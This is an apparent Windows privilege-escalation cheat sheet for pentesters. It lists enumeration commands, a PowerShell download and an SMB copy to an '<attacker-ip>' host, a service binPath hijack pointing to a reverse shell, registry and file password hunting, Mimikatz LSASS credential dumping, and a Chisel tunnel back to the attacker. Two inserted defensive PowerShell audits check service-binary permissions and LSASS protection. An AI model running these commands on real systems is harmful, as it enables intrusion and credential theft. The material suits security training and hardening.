Windows Privilege Escalation Cheat Sheet – From User to Admin! Master Enumeration, Service Exploits & Credential Dumping! Learn Registry Exploitation, Misconfigured Services & Automated Tools! Use WinPEAS, PowerUp & Mimikatz for Advanced Privilege Escalation! Essential for Ethical Hackers, Pentesters & Red Teamers! Enhance Your Windows Privilege Escalation Skills!
Windows Privilege Escalation Cheatsheet 🚀 - Hacklivly.com
Privilege escalation is a critical phase in penetration testing and Windows
post-exploitation. Once an attacker gains a foothold on a machine, escalating
privileges to Administrator or SYSTEM can unlock deeper access and lateral
movement across the network. This cheatsheet provides a
structured step-by-step guide to enumeration, exploiting misconfigurations, credential
dumping, service abuse, registry exploitation, and more!
Letʼs escalate to SYSTEM!
—
General Enumeration - Who Am I?
Basic User Information
whoami /all
echo %USERNAME%
whoami /groups
Do I Have Anything Fun? (Privileges Check)
whoami /priv
net user <username>
Look for SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, etc 🚨
Where Am I? (System Info)
systeminfo
hostname
Look for hotfixes, outdated versions, and patch levels!
—
Anyone Home? (Users & Groups)
net users
net localgroup administrators
Check Logged-In Users
query user
—
What Am I Part Of? (Domain Enumeration)
whoami /groups
net group "Domain Admins" /domain
—
What Is This Place? (System & Installed Software Info)
wmic product get name,version,vendor
Look for outdated software for exploits.
—
Is It Fancy? (Checking System Integrity)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Look for Windows version for kernel exploits.
—
Am I Tied Up? (Restrictions & Policies)
gpresult /z
Look for GPO restrictions that may prevent actions.
—
Anything Reachable? (Network Info & Open Ports)
ipconfig /all
netstat -ano
Check for open ports, firewall rules, or RDP access.
—
What Does The Inside Look Like? (Processes & Services)
tasklist /v
wmic service get name,displayname,pathname,startmode
Look for misconfigured services and exploitable binaries.
—
🔟 Leave Me Alone! (Defender & AV Checks)
sc query windefend
wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayName
Look for Windows Defender or AV software that might block your attacks.
—
🛠 Exploitation Techniques 🚀
🔹 File Transfer - Upload/Download Files
Using SMB
copy file.exe \\<attacker-ip>\share
Using PowerShell
(New-Object System.Net.WebClient).DownloadFile("http://<attacker-ip>/file.exe", "C:\Users\Public\file.exe")
—
🔹 Automated Enumeration - WinPEAS & More
WinPEAS (Privilege Escalation Automated Scanner)
PowerUp - Automated PrivEsc Finder
Import-Module .\PowerUp.ps1
Invoke-AllChecks
—
🔹 Hacking the Services (Service Misconfiguration)
Checking Access using Accesschk.exe
accesschk.exe -uwcqv "Authenticated Users" *
Getting ACLs
icacls "C:\Program Files\VulnerableService"
Exploiting Services - sc.exe
sc config <ServiceName> binPath= "C:\Attack\reverse-shell.exe"
sc start <ServiceName>
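The accesschk and icacls checks above look at one service at a time. The following hardening audit is an added example (not part of the original cheatsheet or of any tool it names): it walks every installed service, extracts the executable from its binPath, and reports any service whose binary or containing folder grants write access to a low-privilege principal (Everyone, Authenticated Users, BUILTIN\Users, Interactive), which is exactly the condition a binPath hijack relies on. The well-known SIDs are real; the function names and the write-rights mask are this example's own choices. Run it elevated on the host being audited so every ACL is readable.

```powershell
# Added hardening audit: services whose binary or folder is writable by low-privilege users.
# Low-privilege principals that should never hold write rights on a service binary.
$lowPrivSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # Authenticated Users
    'S-1-5-32-545',  # BUILTIN\Users
    'S-1-5-4'        # Interactive
)

# Rights that let a principal replace or alter the binary (mask chosen for this example).
$writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Write, Modify, FullControl, ChangePermissions, TakeOwnership'

function Get-ServiceBinaryPath {
    # Pull the executable out of a service PathName such as
    #   "C:\Program Files\Foo\foo.exe" -arg   or   C:\Windows\system32\svchost.exe -k netsvcs
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 0) { return $p.Substring(1, $end - 1) }
        return $p.Trim('"')
    }
    $m = [regex]::Match($p, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($p -split ' ')[0]
}

function Test-LowPrivWritable {
    # True when any Allow ACE for a low-privilege SID carries a write-class right.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $sid = $null
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($lowPrivSids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band [int]$writeMask) -ne 0) { return $true }
    }
    return $false
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $exe = Get-ServiceBinaryPath $svc.PathName
    if (-not $exe) { continue }
    $exe = [Environment]::ExpandEnvironmentVariables($exe)
    $dir = Split-Path -Path $exe -Parent
    $binWritable = Test-LowPrivWritable $exe
    $dirWritable = if ($dir) { Test-LowPrivWritable $dir } else { $false }
    if ($binWritable -or $dirWritable) {
        [pscustomobject]@{
            Service        = $svc.Name
            RunsAs         = $svc.StartName   # LocalSystem here means a full SYSTEM hijack path
            StartMode      = $svc.StartMode
            Binary         = $exe
            BinaryWritable = $binWritable
            FolderWritable = $dirWritable
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize } else { Write-Host 'No service binaries writable by low-privilege users.' }
```

Every row is a remediation item: remove the write ACE (or stop inheriting it from a permissive parent folder) and re-run until the list is empty. Rows where RunsAs is LocalSystem and StartMode is Auto are the ones to fix first.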
—
🔹 Registry Exploitation (Stored Passwords & Secrets)
Finding Credentials in Registry
reg query HKLM /f password /t REG_SZ /s
🔹 Credentials or Hashes (Extracting & Using Credentials)
Extracting Credentials from LSASS
mimikatz.exe
sekurlsa::logonpasswords
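sekurlsa::logonpasswords works by opening lsass.exe and reading the secrets it keeps in memory, so the defensive counterpart is to check whether that read is blocked. The function below is an added example (not from the cheatsheet or from Mimikatz): it reports whether LSA Protection (the RunAsPPL value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, which runs LSASS as a Protected Process Light) is configured and whether Credential Guard is running (Win32_DeviceGuard.SecurityServicesRunning containing 1), and with -Enable it writes RunAsPPL=1. The registry value, key path and WMI class are real; the function name and output fields are this example's own. Run elevated; the RunAsPPL change takes effect after a reboot.

```powershell
# Added example: audit (and optionally enable) the LSASS protections that defeat
# plaintext/hash reads from lsass.exe memory.
function Get-LsassProtectionStatus {
    [CmdletBinding()]
    param([switch]$Enable)

    $lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

    if ($Enable) {
        # RunAsPPL=1 makes lsass.exe a Protected Process Light; unsigned, non-PPL code
        # can no longer open it with the access rights a memory read needs.
        Set-ItemProperty -Path $lsaKey -Name 'RunAsPPL' -Value 1 -Type DWord
    }

    $lsa = Get-ItemProperty -Path $lsaKey -ErrorAction SilentlyContinue
    $runAsPpl = 0
    if ($null -ne $lsa -and $null -ne $lsa.RunAsPPL) { $runAsPpl = [int]$lsa.RunAsPPL }

    # Credential Guard moves the secrets out of LSASS into a VBS-isolated process;
    # SecurityServicesRunning contains 1 when it is active.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                          -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $credGuard = ($null -ne $dg) -and (@($dg.SecurityServicesRunning) -contains 1)

    $status = [pscustomobject]@{
        ComputerName            = $env:COMPUTERNAME
        LsaProtectionConfigured = ($runAsPpl -ge 1)   # 1 = enabled, 2 = enabled without UEFI lock
        RunAsPPLValue           = $runAsPpl
        CredentialGuardRunning  = $credGuard
        RebootRequired          = $Enable.IsPresent
    }

    if (-not $status.LsaProtectionConfigured) {
        Write-Warning "LSA Protection (RunAsPPL) is not configured on $($status.ComputerName)"
    }
    if (-not $status.CredentialGuardRunning) {
        Write-Warning "Credential Guard is not running on $($status.ComputerName)"
    }
    $status
}

# Report only; add -Enable to switch LSA Protection on.
Get-LsassProtectionStatus
```

On hosts where neither protection is on, a handle opened to lsass.exe by an unexpected process is the detection signal to alert on (Sysmon Event ID 10, ProcessAccess, filtered on TargetImage ending in lsass.exe).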
RunAs - Running Programs as Another User
runas /user:Administrator cmd.exe
—
🔹 Find Files Fast (Hunting for Sensitive Files)
dir /s /b *password*.*
—
🔹 Port Forwarding (Pivoting & Lateral Movement)
Using Chisel
chisel client <attacker-ip>:8080 R:9999:127.0.0.1:3389
Use it to tunnel RDP, SSH, or SMB through firewalls.
—
🔥 Final Thoughts
Mastering Windows Privilege Escalation requires practice. Focus
on enumeration, misconfigurations, credentials, services, registry, and
network pivoting.
🚀 “Try Harderˮ and Hack Like a Pro!